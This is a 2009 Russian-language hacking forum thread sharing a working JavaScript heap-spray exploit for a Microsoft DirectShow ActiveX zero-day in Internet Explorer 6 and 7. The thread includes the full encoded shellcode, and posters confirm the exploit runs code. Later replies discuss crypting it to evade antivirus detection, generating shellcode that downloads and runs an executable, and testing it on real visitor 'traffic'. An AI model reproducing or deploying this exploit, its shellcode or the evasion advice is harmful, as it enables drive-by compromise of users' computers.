0-day bugs в MS DirectShow (FINAL)

Discussion in 'Мировые новости. Обсуждения.' started by slesh, 7 Jul 2009.

  1. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,704
    Likes Received:
    1,224
    Reputations:
    455
    0-day bugs в MS DirectShow (Рабочий сплоит)

    Как уже было написано раньше, существует уязвимость в DirectShow. Предыдущие новости все описывали что баг существует, но сплоита в паблике небыло.

    И Вот сегодня появился сплоит в паблике (НО ВЕЗДЕ ОН БЫЛ НЕ РАБОЧИЙ)

    По адресу http://www.securitylab.ru/poc/382196.php
    выложен сплоит:
    Code:
    var appllaa='0';
    var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
    var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
                 "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
                 "%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
                 "%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
                 "%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
                 "%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
                 "%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
                 "%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
                 "%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
                 "%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
                 "%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
                 "%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
                 "%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
                 "%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
                 "%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
                 "%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
                 "%u6363%u5251%u634c%u5553%u4550");
    var headersize=20;
    var omybro=unescape(nndx);
    var slackspace=headersize+dashell.length;
    while(omybro.length<slackspace)
    omybro+=omybro;
    bZmybr=omybro.substring(0,slackspace);
    shuishiMVP=omybro.substring(0,omybro.length-slackspace);
    while(shuishiMVP.length+slackspace<0x30000)
    shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
    memory=new Array();
    for(x=0;x<300;x++)
    memory[x]=shuishiMVP+dashell;
    var myObject=document.createElement('object');
    DivID.appendChild(myObject);
    myObject.width='1';
    myObject.height='1';
    myObject.data='./logo.gif';
    myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
    
    Но он является не полным, по этому многие проверив, сразу увидели что толку от этого мало.

    Поискав в инете на забугорном сайте и чуть подправив код, получаем рабочий сплоит!!

    Протестировал на IE 7 - влегкую пробил осла, запустил калькулятор и закрыл осла.

    В аттаче находится рабочий сплоит и картинка - которая как раз и является его основной частью.
     

    Attached Files:

    #1 slesh, 7 Jul 2009
    Last edited: 7 Jul 2009
    9 people like this.
  2. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,704
    Likes Received:
    1,224
    Reputations:
    455
    P.S. Пароль на архив: a4at
     
    1 person likes this.
  3. Only

    Only Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    20
    Likes Received:
    20
    Reputations:
    30
    Спасибо!
    Может пригодиться;)
     
  4. m0le[x]

    m0le[x] Wardriver

    Joined:
    25 Oct 2006
    Messages:
    801
    Likes Received:
    580
    Reputations:
    105
    Хмм.. Действительно работает, IE упал, запустился калькулятор...
    slesh +5
     
    1 person likes this.
  5. nonamez

    nonamez Elder - Старейшина

    Joined:
    22 Jul 2007
    Messages:
    628
    Likes Received:
    283
    Reputations:
    17
    каспером уже палицо кстати.
     
  6. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,704
    Likes Received:
    1,224
    Reputations:
    455
    2 nonamez так можно криптануть и будет норм наверное )
     
  7. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    758
    Likes Received:
    1,053
    Reputations:
    291
    Кстате даже комодо палит)

    [​IMG]
     
  8. Only

    Only Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    20
    Likes Received:
    20
    Reputations:
    30
    NOD32 молчит...
     
  9. serg_1966

    serg_1966 New Member

    Joined:
    2 Jul 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Как сгенерировать dashell (ShellCode) под свои нужды. К примеру запустить файл http://google.com/file.exe
    Спасибо.
     
  10. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    Воспользоваться генератором шелов. Если не ошибаюсь автор Proteus (ну покрайней мере автор ГУЕВ под него). Ищи на Метасплойте

    http://www.metasploit.com/shellcode/
     
    #10 spider-intruder, 8 Jul 2009
    Last edited: 8 Jul 2009
    1 person likes this.
  11. Hellsp@wn

    Hellsp@wn Elder - Старейшина

    Joined:
    29 Apr 2007
    Messages:
    402
    Likes Received:
    153
    Reputations:
    48
    комодо почти все сплоиты палит :) у них там грамотно этот момент реализован,
    остальным можно только поучиться.
    з.ы. толку от сплоита мало, он разрешения требует на активх.
     
  12. Only

    Only Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    20
    Likes Received:
    20
    Reputations:
    30
    У меня не просило
     
  13. elPiratos

    elPiratos New Member

    Joined:
    7 Apr 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    да!
    от сплойта толку мало
    просит разрешения на активХ
    думал как то обходится, или еще что то, но так ничего путнего не нашел.
    два дня уже парюсь.
    или же как то обходится?
     
  14. oldharryis

    oldharryis New Member

    Joined:
    26 Oct 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    логично предположить, что ты настройки безопасности в осле менял. по-умолчанию в IE 7 и выше activeX подгружаеться только с разрешения пользователя.

    to elPiratos старо как мир, но всё таки ....

    [​IMG]
     
  15. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    Кому там генератор ШЕЛКОДОВ?

    http://www.sendspace.com/file/brp2ry

    Думаю протеус не против, не привт вроде. :)
     
  16. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,704
    Likes Received:
    1,224
    Reputations:
    455
    1) бьет запросто IE 6 и IE7
    2) AX просит включить только при тестировании на локалхосте. Реально заливаете на любой сервак сплоит и тестируете - и все молчат.
    3) брайзерозависимый крипт спасает от половины тех кто палит ) может даже больше
    4) на IE8 непашет и не будет вроде пахать.
    5) шелкод нормальный можно взять из любой связки. там их полно ) Я всяз кактойто маленький и прям хорошо работал на XP SP2, SP3, Win 2003 SP2
     
  17. Hellsp@wn

    Hellsp@wn Elder - Старейшина

    Joined:
    29 Apr 2007
    Messages:
    402
    Likes Received:
    153
    Reputations:
    48
    нет, это скорее зависит от хоста, залил на пару своих, всё равно просит.
     
  18. elPiratos

    elPiratos New Member

    Joined:
    7 Apr 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    не бьет он на ие7
    проверял траффом!
    1-3% может всего.
    все зависит от настроек в ие.
    не верю!
    дай линк пущу трафф, увидишь!
     
Loading...